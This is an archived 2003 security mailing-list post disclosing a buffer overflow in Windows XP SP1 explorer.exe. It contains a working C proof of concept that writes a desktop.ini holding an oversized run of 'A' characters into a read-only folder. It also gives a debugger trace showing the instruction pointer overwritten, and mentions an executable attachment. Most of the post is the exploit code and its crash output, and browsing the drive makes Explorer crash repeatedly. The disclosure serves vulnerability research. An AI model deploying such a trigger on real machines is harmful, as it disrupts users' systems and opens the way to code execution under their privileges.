Hosting Provided By

Buffer overflow in Explorer.exe

From: aT4r InsaN3 <at4r(at)hotmail.com>
Date: Wed May 07 2003 - 16:53:50 EDT

This bug allow a malicious an attacker to execute data with privileges of a user that is browsing the hard disk with explorer.

tested against winxp SP1

example code provided.

	Buffer Overflow in explorer.exe - Proof of Concept
	Tested only against: Windows XP SP1

	Found by aT4r@3wdesign.es

	Saludos a:
	- #Haxorcitos@efnet= { "Tarako", "Croulder", "Drakar" , "[back]", "tyr" }:
	- #localhost and #darknet


	Usage: just execute this file.
		This code will crash your explorer every time you try to browse your 
harddisk
		execute this program again to delete the evil file ;-)

	(3ec.464): Access violation - code c0000005 (first chance)
	First chance exceptions are reported before any exception handling.
	This exception may be expected and handled.
	eax=00410041 ebx=0012aca8 ecx=77e5e1c4 edx=002f0000 esi=00121b70 
edi=000ece90
	eip=00410041 esp=0177dfb0 ebp=00410041 iopl=0         nv up ei pl zr na po 
nc
	cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             
efl=00010246
	00410041 ??               ???

	3W Design Security 2003.	
http://www.3WDesign.es/

#include <direct.h>
#include <stdio.h>
#include <windows.h>
#include <sys/stat.h>

#define BUFF 2300

void main(){

	char path[256];
	char evil[BUFF+1]="";
	FILE *bof;
	struct stat st;
	printf("\n . .. ...: \tBuffer overflow in explorer.exe\t\t:... .. .\n . .. 
...: \tProof of Concept (aT4r@3wdesign.es)\t:... .. .\n\n");
	strcpy(path,"\\aT4r[at]3WDesign.es Security");
	mkdir(path);
	SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);

	strcat(path,"\\desktop.ini");
	if (stat(path,&st)==0)
		{ remove(path);	exit(1);}//just execute this program twice to remote this 
file :P
	bof=fopen(path,"w");
	fputs("[.ShellClassInfo]\n",bof);
	memset(evil,'A',BUFF);
	fputs(evil,bof);
	fclose(bof);
	printf("evil file: %s Created. Try to browse your Harddisk O:-)\n",path);

}

Hipotecas para todos los bolsillos con MSN Money. http://money.msn.es/hipotecas/default.asp

application/octet-stream attachment: explorerbof.exe

Received on Thu May 8 12:12:47 2003

Do you need help?

This message: [ Message body ]
Next message: descript: "s0h: Kerio Personal Firewall and Tiny Personal Firewall remote exploit/patch."
Previous message: distoage(at)altern.org: "nokia calendar memory errors"
In reply to Mike Mires: "freeconsole()"
Next in thread: Ryan Yagatich: "Re: Buffer overflow in Explorer.exe"
Reply: Ryan Yagatich: "Re: Buffer overflow in Explorer.exe"
Reply: aT4r InsaN3: "Re: Buffer overflow in Explorer.exe"
Reply: Kristopher Matthews: "RE: Buffer overflow in Explorer.exe"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:38 EDT